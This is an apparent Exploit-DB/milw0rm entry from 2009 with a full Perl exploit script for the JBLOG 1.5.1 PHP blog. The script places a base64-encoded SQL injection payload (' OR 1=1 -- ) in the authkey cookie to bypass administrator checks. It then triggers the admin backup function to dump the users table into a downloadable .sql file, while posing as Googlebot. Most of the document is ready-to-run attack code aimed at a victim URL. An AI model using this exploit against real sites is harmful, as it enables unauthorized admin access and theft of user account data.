JBLOG 1.5.1 - SQL Table Backup

EDB-ID:

9430

CVE:



Author:

Ams

Type:

webapps


Platform:

PHP

Date:

2009-08-13


#!/usr/bin/perl

=about

 VENDOR
    JBLOG 1.5.1
    (maybe earlier versions vulnerable too)
    http://www.lisijie.org

 AUTHOR
    discovered & written by Ams
    ax330d [doggy] gmail [dot] com
    http://www.0x416d73.name/

 VULNERABILITY DESCRIPTION
    Both 'index.php' and 'admin.php' includes file 'common.php' which checks
    for user permission on line 81 via function 'check_user()'.
    This function is defined in file 'include/func_user.php'.
    There is another one function - 'get_cookie()' which gets cookie values.
    So, in cookies we put our evil string and further actions should be clear.

    Why we don't filter COOKIEs ?

 EXPLOIT WORK
    This exploit uses SQL-injection to create dump of users table.
    Actually, we are possible to do all administrator actions.

 REQUIREMENTS
    1. You need to know prefix, by default it is 'jblog_'.
    But there is no problem to find it out.
    2. Rights to write to 'cache/' folder.

=cut

use strict;
use warnings;

use LWP::UserAgent;
use HTTP::Request::Common;
use MIME::Base64;
use Getopt::Long;

Banner();
$| = 1;

my $expl_url;
my $prefix = 'jblog_';
my $proxy  = '';

GetOptions(
    'u=s'   => \$expl_url,
    'pre=s' => \$prefix,
    'p=s'   => \$proxy,
) or Usage();

my $spider = LWP::UserAgent->new;
$spider->agent('Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)');
$spider->default_header( 'Cookie' => $prefix . 'authkey=' . encode_base64( "1\t' OR 1=1 -- " ) );
$spider->proxy(['http'], "http://$proxy/") if $proxy ne '';
$spider->timeout( 30 );

Exploit( $expl_url);

sub Exploit {

    $_ = shift || Usage();
    print "\n\tExploiting:\t $_";

    my ($prot , $host, $path, )
        = m{(?:([^:/?#]+):)?(?://([^/?#]*))?([^?#]*)(?:\?([^#]*))?(?:#(.*))?};
    $prot ||= 'http';

    my $url    = "$prot://$host$path";
    my $defact = 'admin.php?ac=data&do=bakout&dosubmit=yes&sizelimit=2048';

    #   First request to prepare
    my $req = GET "$url/$defact&baktables%5B%5D=${prefix}user";
    my $res = $spider->request( $req );
    my ($dir, $file) = $res->content =~ /yes&bakdir=(.*?)&(?:.*?)&filepre=(.*?)'/;

    #   Second request to dump table
    $req = GET "$url/$defact&bakdir=$dir&step=1&baktablestr=${prefix}user&tableid=0&start=0&filepre=$file";
    $res = $spider->request( $req );

    #   Finally checking if sql backup exists
    $req = HEAD "$url/cache/backup/$dir/${file}_1.sql";
    $res = $spider->request( $req );    

    if ( $res->is_success ) {
        print "\n\tLooks ok, check $prot://$host${path}cache/backup/$dir/${file}_1.sql\n";
    } else {
        printf(
            "\n\tFailure, server response: %s\n\tAnyway, check: %s\n",
            $res->status_line, "$prot://$host${path}cache/backup/$dir/${file}_1.sql");
    }
}

sub Usage {

    print <<USAGE;

        Usage:
        -u     Set url of victim
            optional:
        -pre   Prefix, default 'jblog_' is used if no one mentioned
        -p     Proxy, set as ip:port

        Example:
            $0 -u=http://site.com -pre=jblog_ -p=127.0.0.1:8080

USAGE

    exit;
}

sub Banner {

    print <<BANNER;
        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
          JBLOG 1.5.1 Perl exploit
        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
BANNER

}

# milw0rm.com [2009-08-13]